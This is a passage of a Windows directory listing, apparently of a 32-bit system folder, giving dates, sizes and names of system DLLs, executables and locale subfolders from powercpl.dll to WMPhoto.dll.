21.11.2010  05:24           441.856 powercpl.dll
14.07.2009  03:16           145.408 powrprof.dll
21.11.2010  05:24           238.080 ppcsnap.dll
30.07.2015  15:13           103.120 PresentationCFFRasterizerNative_v0300.dll
21.11.2010  05:25           295.264 PresentationHost.exe
21.11.2010  05:25            99.176 PresentationHostProxy.dll
10.06.2009  23:14           778.096 PresentationNative_v0300.dll
06.01.2012  14:07            31.232 prevhost.exe
14.07.2009  03:09            17.408 prflbmsg.dll
14.07.2009  03:14            13.824 print.exe
08.11.2012  15:07    <DIR>          Printing_Admin_Scripts
21.11.2010  05:24           146.389 printmanagement.msc
21.11.2010  05:24           932.352 printui.dll
14.07.2009  03:14            60.928 printui.exe
21.11.2010  05:24           116.736 prncache.dll
21.11.2010  05:24           395.264 prnfldr.dll
14.07.2009  03:16           175.616 prnntfy.dll
21.11.2010  05:24           120.320 prntvpt.dll
14.07.2009  03:16            31.744 profapi.dll
21.11.2010  05:24           988.160 propsys.dll
21.11.2010  05:24            28.672 proquota.exe
21.11.2010  05:25           165.376 provsvc.dll
14.07.2009  03:16           189.952 provthrd.dll
14.07.2009  03:16             6.144 psapi.dll
14.07.2009  03:16            50.688 psbase.dll
10.06.2009  23:39                51 pscript.sep
14.07.2009  03:19            52.816 PSHED.DLL
06.01.2012  14:10           465.408 psisdecd.dll
06.01.2012  14:10            75.776 psisrndr.ax
14.07.2009  03:14           696.320 psr.exe
14.07.2009  03:16            42.496 pstorec.dll
14.07.2009  03:16            23.552 pstorsvc.dll
01.05.2013  08:40    <DIR>          pt-BR
01.05.2013  08:40    <DIR>          pt-PT
14.07.2009  03:16           169.472 puiapi.dll
21.11.2010  05:24           324.608 puiobj.dll
21.11.2010  05:24            51.200 PushPrinterConnections.exe
14.07.2009  03:15            41.984 pwrshplugin.dll
21.11.2010  05:23           171.520 QAGENT.DLL
08.12.2015  23:53           206.848 qasf.dll
21.11.2010  05:24           190.976 qcap.dll
21.11.2010  05:23            71.680 QCLIPROV.DLL
21.11.2010  05:24           283.136 qdv.dll
14.06.2016  17:21           519.680 qdvd.dll
08.12.2015  23:53           509.952 qedit.dll
14.07.2009  03:09           733.184 qedwipes.dll
11.10.2016  17:18           125.952 qintlgnt.ime
14.07.2009  03:16            21.504 qmgrprxy.dll
21.11.2010  05:24           167.936 QSHVHOST.DLL
21.11.2010  05:24            99.328 QSVRMGMT.DLL
04.03.2017  03:14         1.329.664 quartz.dll
21.11.2010  05:23         1.363.456 Query.dll
11.10.2016  17:18           125.952 quick.ime
21.11.2010  05:24            80.896 QUTIL.DLL
14.07.2009  03:16           210.944 qwave.dll
21.11.2010  05:24         1.115.136 RacEngn.dll
14.07.2009  03:16           111.616 racpldlg.dll
21.11.2010  05:24           105.559 RacRules.xml
14.07.2009  03:16            85.504 radardt.dll
14.07.2009  03:16            62.976 radarrs.dll
14.07.2009  05:20    <DIR>          ras
14.07.2009  03:16            11.776 rasadhlp.dll
14.07.2009  03:16           325.120 rasapi32.dll
14.07.2009  03:14            16.896 rasautou.exe
14.07.2009  03:16            81.408 rascfg.dll
21.11.2010  05:24           318.976 raschap.dll
10.06.2009  23:39             1.820 rasctrnm.h
14.07.2009  03:16            15.360 rasctrs.dll
14.07.2009  03:16            61.952 rasdiag.dll
14.07.2009  03:14            73.216 rasdial.exe
14.07.2009  03:16           772.608 rasdlg.dll
14.07.2009  03:14           101.888 raserver.exe
14.07.2009  03:16           761.856 rasgcw.dll
14.07.2009  03:16            76.800 rasman.dll
14.07.2009  03:16           845.824 RASMM.dll
14.07.2009  03:16           179.200 rasmontr.dll
14.07.2009  03:16            33.280 rasmxs.dll
14.07.2009  03:14            50.176 rasphone.exe
14.07.2009  03:16           385.024 rasplap.dll
21.11.2010  05:24           176.640 rasppp.dll
14.07.2009  03:16            22.528 rasser.dll
21.11.2010  05:24            69.632 rastapi.dll
04.09.2014  07:04           372.736 rastls.dll
17.02.2012  07:34           826.880 rdpcore.dll
21.11.2010  05:24            52.224 rdpd3d.dll
21.11.2010  05:24           186.368 rdpencom.dll
21.11.2010  05:25           140.800 rdpendp.dll
23.08.2012  13:12           192.000 rdpendp_winip.dll
21.11.2010  05:23            21.504 rdprefdrvapi.dll
14.07.2009  03:14            36.352 rdrleakdiag.exe
16.07.2015  21:12           856.064 rdvidcrl.dll
21.11.2010  05:24           247.808 ReAgent.dll
21.11.2010  05:24            22.016 ReAgentc.exe
14.07.2009  03:14            11.776 recover.exe
14.07.2009  05:20    <DIR>          Recovery
14.07.2009  03:14            62.464 reg.exe
21.11.2010  05:24            72.192 regapi.dll
14.07.2009  03:16            41.472 RegCtrl.dll
14.07.2009  03:14           398.336 regedit.exe
14.07.2009  03:14             9.216 regedt32.exe
14.07.2009  03:14            44.032 regini.exe
19.11.2013  10:42            71.680 RegisterIEPKEYs.exe
14.07.2009  03:14            14.848 regsvr32.exe
14.07.2009  03:14            61.440 rekeywiz.exe
25.05.2015  20:00            37.888 relog.exe
21.11.2010  05:23           146.944 remotepg.dll
14.07.2009  03:14            82.432 remotesp.tsp
14.07.2009  01:19             6.144 rendezvousSession.tlb
14.07.2009  03:14            16.896 replace.exe
08.12.2015  23:53           206.848 RESAMPLEDMO.DLL
14.07.2009  03:14           103.424 resmon.exe
13.07.2009  22:29               714 RestartManager.mof
13.07.2009  22:29               176 RestartManagerUninstall.mof
14.07.2009  07:32    <DIR>          restore
21.11.2010  05:24            71.168 resutils.dll
14.07.2009  03:16           147.968 rgb9rast.dll
21.11.2010  05:25           220.672 Ribbons.scr
21.11.2010  05:24           473.600 riched20.dll
21.11.2010  05:24             8.704 riched32.dll
09.03.2004  18:45           212.240 richtx32.ocx
04.12.2013  03:54           572.416 RMActivate.exe
04.12.2013  03:54           594.944 RMActivate_isv.exe
04.12.2013  03:54           510.976 RMActivate_ssp.exe
04.12.2013  03:54           508.928 RMActivate_ssp_isv.exe
14.07.2009  03:14            14.848 RmClient.exe
14.07.2009  03:09             2.560 rnr20.dll
14.07.2009  05:20    <DIR>          ro-RO
21.11.2010  05:24            98.816 Robocopy.exe
14.07.2009  03:14            17.920 ROUTE.EXE
14.07.2009  03:16             8.192 RpcDiag.dll
28.04.2017  02:32           141.312 rpchttp.dll
14.07.2009  03:16            44.544 RPCNDFP.dll
14.07.2009  03:16             7.680 RpcNs4.dll
14.07.2009  03:16            27.648 rpcnsh.dll
14.07.2009  03:14            34.816 RpcPing.exe
28.04.2017  02:32           666.112 rpcrt4.dll
21.11.2010  05:24            46.080 RpcRtRemote.dll
14.06.2016  17:05            50.176 rrinstaller.exe
14.07.2009  03:17           242.936 rsaenh.dll
14.07.2009  03:16            43.008 rshx32.dll
04.11.2011  19:20           274.432 rsnp2uvc.dll
10.06.2009  23:28            43.566 rsop.msc
14.07.2009  03:16           152.064 RstrtMgr.dll
26.01.2012  23:46    <DIR>          RTCOM
14.07.2009  03:16            36.864 rtffilt.dll
14.07.2009  03:16           115.200 rtm.dll
22.07.2011  06:37         9.888.360 RtsUStoricon.dll
21.11.2010  05:24            37.376 rtutils.dll
01.05.2013  08:40    <DIR>          ru-RU
14.07.2009  03:14            17.408 runas.exe
14.07.2009  03:14            44.544 rundll32.exe
14.07.2009  03:14            57.856 RunLegacyCPLElevated.exe
21.11.2010  05:23            50.688 runonce.exe
21.11.2010  05:23            51.200 samcli.dll
09.02.2017  18:14            60.416 samlib.dll
14.07.2009  03:09             2.048 SampleRes.dll
14.07.2009  03:16             8.704 sas.dll
06.01.2012  14:03           850.944 sbe.dll
14.07.2009  03:16           153.600 sbeio.dll
14.07.2009  03:09            65.536 sberes.dll
14.07.2009  03:14            12.288 sbunattend.exe
14.07.2009  03:14            37.376 sc.exe
21.11.2010  05:25           246.272 scansetting.dll
14.07.2009  03:16            66.048 SCardDlg.dll
21.11.2010  05:23           175.616 scecli.dll
08.12.2014  04:46           308.224 scesrv.dll
28.04.2017  02:32           254.464 schannel.dll
21.11.2010  05:24            17.408 schedcli.dll
21.11.2010  05:23           179.712 schtasks.exe
14.07.2009  03:16           180.224 scksp.dll
14.07.2009  03:16            57.856 scripto.dll
14.07.2009  03:14            10.240 scrnsave.scr
14.07.2009  03:16           173.568 scrobj.dll
21.11.2010  05:25           464.896 scrptadm.dll
12.10.2013  04:03           163.840 scrrun.dll
26.01.2012  23:48    <DIR>          sda
29.10.2015  19:49            20.992 sdbinst.exe
14.07.2009  03:14            40.960 sdchange.exe
14.07.2009  03:16           178.176 sdiageng.dll
14.07.2009  03:14            21.504 sdiagnhost.exe
14.07.2009  03:16           240.128 sdiagprv.dll
14.07.2009  03:16           358.400 sdohlp.dll
06.01.2012  14:08            86.528 SearchFilterHost.exe
21.11.2010  05:23           646.144 SearchFolder.dll
06.01.2012  14:08           427.520 SearchIndexer.exe
06.01.2012  14:08           164.352 SearchProtocolHost.exe
14.07.2009  03:14            35.328 SecEdit.exe
25.05.2015  20:01            92.160 sechost.dll
14.07.2009  03:14            14.848 secinit.exe
04.12.2013  04:03           428.032 secproc.dll
04.12.2013  04:03           423.936 secproc_isv.dll
04.12.2013  04:03            87.040 secproc_ssp.dll
04.12.2013  04:03            87.040 secproc_ssp_isv.dll
28.04.2017  02:32            22.016 secur32.dll
14.07.2009  03:09             4.608 security.dll
14.07.2009  03:16            65.536 sendmail.dll
14.07.2009  03:16            49.664 Sens.dll
14.07.2009  03:16            10.752 SensApi.dll
14.07.2009  03:16           129.024 SensorsApi.dll
21.11.2010  05:25         2.202.624 SensorsCpl.dll
14.07.2009  03:16            15.360 serialui.dll
10.06.2009  23:21            92.745 services.msc
14.07.2009  03:16            18.432 serwvdrv.dll
21.11.2010  05:23           113.664 SessEnv.dll
21.11.2010  05:24           270.336 sethc.exe
19.11.2013  10:42            74.240 SetIEInstalledDate.exe
08.11.2012  15:07    <DIR>          Setup
28.04.2017  02:08            25.600 setup16.exe
21.11.2010  05:23         1.667.584 setupapi.dll
21.11.2010  05:25           115.712 setupcln.dll
14.07.2009  03:14            17.920 setupSNK.exe
21.11.2010  05:24           113.152 setupugc.exe
14.07.2009  03:14            46.080 setx.exe
14.07.2009  03:10             2.560 sfc.dll
14.07.2009  03:14            35.328 sfc.exe
22.07.2010  09:48            74.064 SFCOM.dll
14.07.2009  03:16            40.960 sfc_os.dll
12.08.2005  12:10           134.144 SfxBar.dll
21.11.2010  05:24           108.032 shacct.dll
26.07.2013  03:55           180.224 shdocvw.dll
29.08.2016  17:12        12.880.384 shell32.dll
14.07.2009  03:04           514.048 shellstyle.dll
14.07.2009  03:16             7.168 shfolder.dll
21.11.2010  05:24            20.992 shgina.dll
10.06.2009  23:30            16.740 ShiftJIS.uce
29.10.2015  19:50             5.120 shimeng.dll
21.11.2010  05:23            35.840 shimgvw.dll
21.11.2010  05:23           350.208 shlwapi.dll
14.07.2009  03:16            14.336 shpafact.dll
14.07.2009  03:14           391.680 shrpubw.exe
21.11.2010  05:24           111.104 shsetup.dll
21.11.2010  05:24           328.192 shsvcs.dll
21.11.2010  05:24            10.752 shunimpl.dll
14.07.2009  03:14            30.720 shutdown.exe
21.11.2010  05:24           428.544 shwebsvc.dll
14.07.2009  03:16            41.984 signdrv.dll
14.07.2009  02:11            12.288 simpdata.tlb
10.11.2010  12:54            49.016 sirenacm.dll
21.11.2010  05:24            19.456 sisbkup.dll
14.07.2009  05:20    <DIR>          sk-SK
14.07.2009  05:20    <DIR>          sl-SI
14.07.2009  03:16            27.136 slc.dll
14.07.2009  03:16            16.384 slcext.dll
08.11.2012  15:07    <DIR>          slmgr
10.06.2009  23:38           113.629 slmgr.vbs
21.11.2010  05:23            14.336 slwga.dll
04.10.2013  03:58           152.576 SmartcardCredentialProvider.dll
14.07.2009  03:16            84.992 SMBHelperClass.dll
21.11.2010  05:24           314.368 SndVol.exe
21.11.2010  05:24           220.160 SndVolSSO.dll
14.07.2009  03:16            22.528 snmpapi.dll
14.07.2009  03:16           126.464 softkbd.dll
14.07.2009  03:16             8.704 softpub.dll
14.07.2009  03:14            19.968 sort.exe
14.07.2009  03:16            38.400 SortServer2003Compat.dll
14.07.2009  03:16            54.784 SortWindows6Compat.dll
21.11.2010  05:24            61.952 spbcd.dll
14.07.2009  07:32    <DIR>          Speech
14.07.2009  03:16            81.920 spfileq.dll
14.07.2009  03:16            75.776 SPInf.dll
14.07.2009  03:16             8.192 spnet.dll
21.11.2010  05:24            19.968 spopk.dll
14.07.2009  05:20    <DIR>          spp
21.11.2010  05:25           172.544 spp.dll
21.11.2010  05:23           121.344 sppc.dll
14.07.2009  03:16           389.632 sppcc.dll
14.07.2009  03:16         1.111.552 sppcext.dll
21.11.2010  05:24           193.536 sppcomapi.dll
14.07.2009  03:16           345.088 sppcommdlg.dll
21.11.2010  05:23           100.864 sppinst.dll
21.11.2010  05:31    <DIR>          sppui
14.07.2009  03:16           118.784 sppwmi.dll
14.07.2009  03:16            11.264 spwinsat.dll
21.11.2010  05:24           352.768 spwizeng.dll
14.07.2009  03:10         8.338.432 spwizimg.dll
21.11.2010  05:24             7.680 spwizres.dll
12.08.2016  18:31             8.192 spwmp.dll
14.07.2009  03:16           151.552 sqlceoledb30.dll
14.07.2009  03:16           605.184 sqlceqp30.dll
21.11.2010  05:24           309.760 sqlcese30.dll
25.03.2011  20:42           338.432 sqlite36_engine.dll
21.11.2010  05:24           778.240 sqlsrv32.dll
14.07.2009  02:12           106.496 sqlsrv32.rll
14.07.2009  03:16           180.800 sqlunirl.dll
14.07.2009  03:16            24.603 sqlwid.dll
13.07.2009  23:03            49.179 sqlwoa.dll
21.11.2010  05:24           189.952 sqmapi.dll
14.07.2009  05:20    <DIR>          sr-Latn-CS
21.11.2010  05:25           301.568 srchadmin.dll
28.04.2017  02:32            43.008 srclient.dll
14.07.2009  03:14            14.848 srdelayed.exe
14.07.2009  03:16            73.216 srhelper.dll
14.07.2009  03:16           302.592 SrpUxNativeSnapIn.dll
21.11.2010  05:24            90.112 srvcli.dll
21.11.2010  05:23             9.728 sscore.dll
14.07.2009  03:16            39.936 ssdpapi.dll
28.04.2017  02:32            96.768 sspicli.dll
14.07.2009  03:16           110.080 SSShim.dll
21.11.2010  05:25           293.888 ssText3d.scr
14.07.2009  03:16            65.024 stclient.dll
14.07.2009  01:43            16.896 stdole2.tlb
10.06.2009  23:29             7.168 stdole32.tlb
14.07.2009  03:16           199.680 sti.dll
21.11.2010  05:24           228.352 stobject.dll
10.06.2009  23:25             4.208 storage.dll
14.07.2009  03:16            62.464 StorageContextHandler.dll
14.07.2009  03:16            60.928 Storprop.dll
11.05.2016  17:19           363.520 StructuredQuery.dll
10.06.2009  23:30            93.702 SubRange.uce
14.07.2009  03:14            13.824 subst.exe
21.11.2010  05:24           755.200 sud.dll
01.05.2013  08:40    <DIR>          sv-SE
06.01.2012  14:04            21.504 svchost.exe
14.07.2009  03:16            31.744 sxproxy.dll
21.11.2010  05:24           380.416 sxs.dll
14.07.2009  03:16            19.456 sxshared.dll
14.07.2009  03:16            22.016 sxsstore.dll
14.07.2009  03:14            27.136 sxstrace.exe
21.11.2010  05:25         2.146.304 SyncCenter.dll
26.09.2012  00:47            78.336 synceng.dll
14.07.2009  03:14            38.912 SyncHost.exe
14.07.2009  03:16             9.728 SyncHostps.dll
14.07.2009  03:16           323.072 SyncInfrastructure.dll
14.07.2009  03:16            15.360 SyncInfrastructureps.dll
11.08.2011  09:12           177.448 SynCOM.dll
14.07.2009  03:16            55.296 Syncreg.dll
11.08.2011  09:12           222.504 SynCtrl.dll
21.11.2010  05:25           159.232 syncui.dll
11.08.2011  09:12           107.816 SynTPCOM.dll
11.08.2011  09:12            66.856 SynTPEnhPS.dll
21.11.2010  05:24           326.656 sysdm.cpl
14.07.2009  03:14            28.672 syskey.exe
21.11.2010  05:24           389.632 sysmon.ocx
08.11.2012  15:07    <DIR>          sysprep
10.06.2009  23:39             3.214 sysprint.sep
10.06.2009  23:39             3.577 sysprtj.sep
21.11.2010  05:24            14.848 syssetup.dll
21.11.2010  05:24           410.624 systemcpl.dll
14.07.2009  03:14            75.776 systeminfo.exe
14.07.2009  03:14            81.920 SystemPropertiesAdvanced.exe
14.07.2009  03:14            81.920 SystemPropertiesComputerName.exe
14.07.2009  03:14            81.920 SystemPropertiesDataExecutionPrevention.exe
14.07.2009  03:14            81.920 SystemPropertiesHardware.exe
14.07.2009  03:14            81.920 SystemPropertiesPerformance.exe
14.07.2009  03:14            81.920 SystemPropertiesProtection.exe
14.07.2009  03:14            81.920 SystemPropertiesRemote.exe
14.07.2009  03:14             8.192 systray.exe
21.11.2010  05:24           109.056 t2embed.dll
21.11.2010  05:24            51.200 takeown.exe
14.07.2009  03:16           855.552 tapi3.dll
14.07.2009  03:16           192.000 tapi32.dll
14.07.2009  03:16           100.864 TapiMigPlugin.dll
14.07.2009  03:16             8.704 tapiperf.dll
21.11.2010  05:24           242.176 tapisrv.dll
14.07.2009  03:16             9.216 TapiSysprep.dll
14.07.2009  03:10           108.544 tapiui.dll
14.07.2009  03:14            11.264 TapiUnattend.exe
21.11.2010  05:23           305.152 taskcomp.dll
21.11.2010  05:23           192.000 taskeng.exe
14.07.2009  03:14            77.824 taskkill.exe
14.07.2009  03:14            80.896 tasklist.exe
21.11.2010  05:23           227.328 taskmgr.exe
14.07.2009  05:20    <DIR>          Tasks
21.11.2010  05:24           505.856 taskschd.dll
10.06.2009  23:38           145.059 taskschd.msc
14.07.2009  03:16            36.864 TaskSchdPS.dll
05.02.2016  19:33            15.360 tbs.dll
14.07.2009  03:14            13.824 tcmsetup.exe
21.11.2010  05:23             1.041 tcpbidi.xml
21.11.2010  05:24           181.760 tcpipcfg.dll
21.11.2010  05:23            61.440 tcpmonui.dll
14.07.2009  03:14             9.216 TCPSVCS.EXE
16.04.2017  09:29            73.216 tdc.ocx
22.07.2015  19:53           635.392 tdh.dll
14.07.2009  03:14           106.496 telephon.cpl
21.11.2010  05:24           352.768 termmgr.dll
14.07.2009  05:20    <DIR>          th-TH
14.07.2009  03:16           313.856 thawbrkr.dll
21.11.2010  05:24         2.157.568 themecpl.dll
21.11.2010  05:24         2.755.072 themeui.dll
21.11.2010  05:24            82.944 thumbcache.dll
10.06.2009  23:15             1.988 ticrf.rat
30.12.2011  07:27           478.720 timedate.cpl
14.07.2009  03:16             8.192 TimeDateMUICallback.dll
14.07.2009  03:14            27.136 timeout.exe
11.10.2016  17:18           126.976 tintlgnt.ime
21.11.2010  05:24            69.632 tlscsp.dll
10.06.2009  23:43           144.862 tpm.msc
14.07.2009  03:16            40.960 tpmcompc.dll
14.07.2009  03:14            94.720 TpmInit.exe
06.01.2012  14:08         1.549.312 tquery.dll
01.05.2013  08:40    <DIR>          tr-TR
25.05.2015  20:00           364.544 tracerpt.exe
14.07.2009  03:14            12.288 TRACERT.EXE
14.07.2009  03:16            33.280 traffic.dll
21.11.2010  05:24            21.504 TRAPI.dll
14.07.2009  01:15            16.384 tree.com
21.11.2010  05:23            12.288 tsbyuv.dll
14.07.2009  03:16            13.312 TSChannel.dll
16.07.2015  21:12            53.248 tsgqec.dll
21.11.2010  05:24           270.848 tsmf.dll
28.04.2017  02:32            65.536 TSpkg.dll
14.07.2009  03:14            38.912 TSTheme.exe
01.08.2014  13:35           793.600 TSWorkspace.dll
06.06.2014  08:16            35.480 TsWpfWrp.exe
14.07.2009  03:16            29.696 tvratings.dll
21.11.2010  05:24           146.432 twext.dll
14.09.2009  20:05           374.064 twnlib4.dll
14.07.2009  03:16            90.624 txflog.dll
14.07.2009  03:16            10.752 txfw32.dll
10.06.2009  23:25           177.856 typelib.dll
25.05.2015  20:00            40.448 typeperf.exe
09.03.2017  18:19             2.048 tzres.dll
21.11.2010  05:24            47.616 tzutil.exe
03.02.2015  05:12           171.520 ubpm.dll
14.07.2009  03:16            48.128 ucmhc.dll
18.01.2017  17:35           922.432 ucrtbase.dll
14.07.2009  03:16            45.056 udhisapi.dll
14.07.2009  03:16            68.096 uexfat.dll
14.07.2009  03:16            95.232 ufat.dll
11.10.2016  15:33           187.392 UIAnimation.dll
14.07.2009  03:16           561.664 UIAutomationCore.dll
14.07.2009  03:16            35.328 uicom.dll
21.11.2010  05:24         2.983.424 UIRibbon.dll
21.11.2010  05:24         1.164.800 UIRibbonRes.dll
14.07.2009  05:20    <DIR>          uk-UA
14.07.2009  03:16           108.544 ulib.dll
14.07.2009  03:16            17.920 umdmxfrm.dll
21.11.2010  05:23           281.088 unimdm.tsp
21.11.2010  05:24            59.392 unimdmat.dll
14.07.2009  03:16            16.896 uniplat.dll
21.11.2010  05:24            34.304 unlodctr.exe
14.07.2009  03:14           278.528 unregmp2.exe
21.11.2010  05:24           346.624 untfs.dll
21.11.2010  05:24           206.848 upnp.dll
14.07.2009  03:14            23.552 upnpcont.exe
14.07.2009  03:16           266.752 upnphost.dll
14.07.2009  03:16            23.040 ureg.dll
19.11.2013  10:42           233.472 url.dll
16.04.2017  08:34         1.314.816 urlmon.dll
14.07.2009  03:16            23.552 usbceip.dll
14.07.2009  03:16            11.264 usbperf.dll
14.07.2009  03:16            80.896 usbui.dll
28.04.2017  02:08             2.048 user.exe
10.11.2016  18:19           833.024 user32.dll
21.11.2010  05:25            78.848 UserAccountControlSettings.dll
14.07.2009  03:14           192.512 UserAccountControlSettings.exe
21.11.2010  05:24           600.064 usercpl.dll
21.11.2010  05:24            81.920 userenv.dll
21.11.2010  05:23            26.624 userinit.exe
07.12.2012  12:46            30.720 usk.rs
10.02.2017  18:17           628.736 usp10.dll
21.11.2010  05:24            31.744 utildll.dll
14.07.2009  03:14         1.397.248 Utilman.exe
14.07.2009  03:16           135.680 uudf.dll
14.07.2009  03:16            20.992 UXInit.dll
21.11.2010  05:24           118.784 uxlib.dll
14.07.2009  03:10             2.560 uxlibres.dll
14.07.2009  03:11           245.760 uxtheme.dll
21.11.2010  05:24           638.976 VAN.dll
21.11.2010  05:24           933.376 Vault.dll
14.07.2009  03:16            36.352 vaultcli.dll
06.07.1998  18:56           125.712 VB6DE.DLL
14.07.2009  03:16            30.749 vbajet32.dll
17.02.2010  22:42            51.584 VBAME.DLL
21.11.2010  05:25           153.600 VBICodec.ax
21.11.2010  05:25            33.792 vbisurf.ax
16.04.2017  10:01           499.200 vbscript.dll
05.10.2013  03:38           339.616 vcamp120.dll
06.11.2012  02:20           252.400 vccorlib110.dll
05.10.2013  03:38           247.984 vccorlib120.dll
11.06.2011  02:58            51.024 vcomp100.dll
05.10.2013  03:38           119.456 vcomp120.dll
14.07.2009  03:16            16.896 vdmdbg.dll
21.11.2010  05:24           160.256 vdsbas.dll
14.07.2009  03:16           518.144 vdsdyn.dll
14.07.2009  03:16            47.616 vdsvd.dll
14.07.2009  03:16            44.544 vds_ps.dll
03.12.1996  15:50            37.376 VEN2232.OLB
14.07.2009  03:14            10.752 verclsid.exe
14.07.2009  03:16           341.504 verifier.dll
14.07.2009  03:14           103.424 verifier.exe
14.07.2009  03:16            21.504 version.dll
14.07.2009  03:16            20.535 vfpodbc.dll
21.11.2010  05:24            56.832 vfwwdm32.dll
14.07.2009  03:14            23.040 vidcap.ax
08.12.2015  23:54           154.112 VIDRESZR.DLL
14.07.2009  03:16            17.408 virtdisk.dll
21.11.2010  05:24            25.600 vpnikeapi.dll
10.12.2011  00:15           305.152 vsnp2uvc.dll
14.07.2009  03:14           115.200 vssadmin.exe
21.11.2010  05:24         1.128.448 vssapi.dll
14.07.2009  03:16            56.320 vsstrace.dll
14.07.2009  03:16            26.112 vss_ps.dll
21.11.2010  05:24            66.048 w32tm.exe
14.07.2009  03:16            26.624 w32topl.dll
14.07.2009  03:16            58.880 WABSyncProvider.dll
14.07.2009  03:14            34.304 waitfor.exe
10.04.2017  09:03    <DIR>          Wat
21.11.2010  05:24           222.208 wavemsp.dll
14.04.2016  03:34    <DIR>          wbem
21.11.2010  05:24           363.008 wbemcomn.dll
08.11.2012  15:07    <DIR>          WCN
14.07.2009  03:16            86.528 WcnApi.dll
21.11.2010  05:24           276.992 wcncsvc.dll
14.07.2009  03:16            20.480 WcnEapAuthProxy.dll
14.07.2009  03:16            20.992 WcnEapPeerProxy.dll
14.07.2009  03:16           994.816 wcnwiz.dll
09.02.2017  17:51            32.768 WcsPlugInService.dll
21.11.2010  05:24         1.227.776 wdc.dll
14.07.2009  05:20    <DIR>          wdi
09.01.2015  04:48            76.800 wdi.dll
28.04.2017  02:32           172.032 wdigest.dll
21.11.2010  05:24           172.032 wdmaud.drv
21.11.2010  05:23           189.952 wdscore.dll
14.07.2009  01:40             4.096 WEB.rs
16.04.2017  09:12           230.400 webcheck.dll
08.09.2016  22:34           208.896 WebClnt.dll
09.03.2016  20:40           316.416 webio.dll
21.11.2010  05:24           782.336 webservices.dll
14.07.2009  03:16            58.368 wecapi.dll
14.07.2009  03:14            80.384 wecutil.exe
29.01.2014  04:06           381.440 wer.dll
14.07.2009  03:16            28.672 werdiagcontroller.dll
14.07.2009  03:14           360.448 WerFault.exe
21.11.2010  05:24            28.672 WerFaultSecure.exe
14.07.2009  03:14            53.760 wermgr.exe
14.07.2009  03:16           160.256 werui.dll
14.07.2009  03:16           262.144 wevtapi.dll
14.07.2009  03:16            83.456 wevtfwd.dll
14.07.2009  03:14           175.616 wevtutil.exe
19.11.2013  10:42           139.264 wextract.exe
10.06.2009  23:27           115.091 WF.msc
14.07.2009  03:16            18.944 wfapigp.dll
14.07.2009  03:16            66.048 WfHC.dll
14.07.2009  03:16            32.768 whealogr.dll
14.07.2009  03:14            35.328 where.exe
14.07.2009  03:16            14.848 whhelper.dll
14.07.2009  03:14            43.008 whoami.exe
14.07.2009  03:14            88.576 wiaacmgr.exe
14.07.2009  03:16           544.256 wiaaut.dll
21.11.2010  05:25           416.768 wiadefui.dll
14.07.2009  03:16           113.664 wiadss.dll
14.07.2009  03:16             8.192 WiaExtensionHost64.dll
14.07.2009  03:16            87.552 wiascanprofiles.dll
14.07.2009  03:16           444.928 wiashext.dll
14.07.2009  03:16            12.800 wiatrace.dll
21.11.2010  05:25           109.568 wiavideo.dll
21.11.2010  05:24           406.528 wimgapi.dll
21.11.2010  05:24           327.680 wimserv.exe
14.02.2017  18:19           497.664 win32spl.dll
14.07.2009  03:16            57.856 winbio.dll
14.07.2009  03:16            12.800 winbrand.dll
04.03.2014  11:17            35.328 wincredprovider.dll
09.04.2016  06:20         1.230.848 WindowsCodecs.dll
01.05.2013  08:32           207.872 WindowsCodecsExt.dll
14.07.2009  07:32    <DIR>          WindowsPowerShell
14.07.2009  03:16            27.648 WinFax.dll
11.05.2016  17:19           351.744 winhttp.dll
16.04.2017  08:37         2.767.872 wininet.dll
14.07.2009  03:14            96.256 wininit.exe
12.05.2016  17:18            70.144 winipsec.dll
21.11.2010  05:24           194.048 winmm.dll
14.07.2009  03:16            16.896 winnsi.dll
08.11.2012  15:07    <DIR>          winrm
10.06.2009  23:40                35 winrm.cmd
10.06.2009  23:40           201.034 winrm.vbs
14.07.2009  03:16            20.992 winrnr.dll
14.07.2009  03:14            39.936 winrs.exe
14.07.2009  03:16           240.128 winrscmd.dll
14.07.2009  03:14            20.480 winrshost.exe
14.07.2009  03:11             1.536 winrsmgr.dll
14.07.2009  03:16            10.752 winrssrv.dll
21.11.2010  05:24           335.872 WinSATAPI.dll
21.11.2010  05:24           134.656 WinSCard.dll
14.07.2009  03:15            11.264 winshfhc.dll
14.07.2009  03:16            68.608 winsockhc.dll
21.11.2010  05:24           320.000 winspool.drv
14.07.2009  03:16            16.896 WINSRPC.DLL
17.07.2014  03:40           157.696 winsta.dll
14.07.2009  03:16           296.960 WinSync.dll
14.07.2009  03:16           173.056 WinSyncMetastore.dll
14.07.2009  03:16           116.736 WinSyncProviders.dll
12.04.2017  17:26           179.200 wintrust.dll
14.07.2009  03:16            16.896 winusb.dll
14.07.2009  03:14            79.872 winver.exe
21.11.2010  05:23            47.104 wkscli.dll
02.10.2013  02:14            17.920 wksprtPS.dll
14.07.2009  03:16            81.408 wlanapi.dll
14.07.2009  03:16           177.152 wlancfg.dll
14.07.2009  03:16           669.696 WLanConn.dll
14.07.2009  03:16           505.856 wlandlg.dll
14.07.2009  03:14            77.312 wlanext.exe
21.11.2010  05:24           411.648 wlangpui.dll
14.07.2009  03:16            84.480 wlanhlp.dll
14.07.2009  03:16            16.896 wlaninst.dll
14.07.2009  03:16           748.544 WlanMM.dll
21.11.2010  05:24           428.032 wlanmsm.dll
21.11.2010  05:24         1.326.592 wlanpref.dll
14.07.2009  03:16           392.192 wlansec.dll
21.11.2010  05:24           410.112 wlanui.dll
14.07.2009  03:16             8.192 wlanutil.dll
21.11.2010  05:24           269.824 Wldap32.dll
14.07.2009  03:16           118.784 wlgpclnt.dll
14.07.2009  03:16             8.704 WlS0WndH.dll
08.12.2015  23:54           902.144 WMADMOD.DLL
08.12.2015  23:54           815.616 WMADMOE.DLL
14.07.2009  03:16           237.568 WMASF.DLL
14.07.2009  03:16            53.760 wmcodecdspps.dll
14.07.2009  03:16            31.744 wmdmlog.dll
14.07.2009  03:16            36.864 wmdmps.dll
21.11.2010  05:24           507.392 wmdrmdev.dll
21.11.2010  05:24           436.736 wmdrmnet.dll
14.06.2016  17:21           617.984 wmdrmsdk.dll
14.07.2009  03:11             2.048 wmerror.dll
01.03.2012  07:29             5.120 wmi.dll
14.07.2009  03:16           155.136 wmidx.dll
14.07.2009  03:16            23.040 wmiprop.dll
21.11.2010  05:24         1.003.008 WMNetMgr.dll
12.08.2016  18:47        11.410.432 wmp.dll
14.07.2009  03:16            22.528 wmpcm.dll
14.07.2009  03:16           170.496 WmpDui.dll
21.11.2010  05:25           299.520 wmpdxm.dll
21.11.2010  05:25           352.256 wmpeffects.dll
21.11.2010  05:25         1.624.064 WMPEncEn.dll
04.02.2015  04:54           417.792 WMPhoto.dll
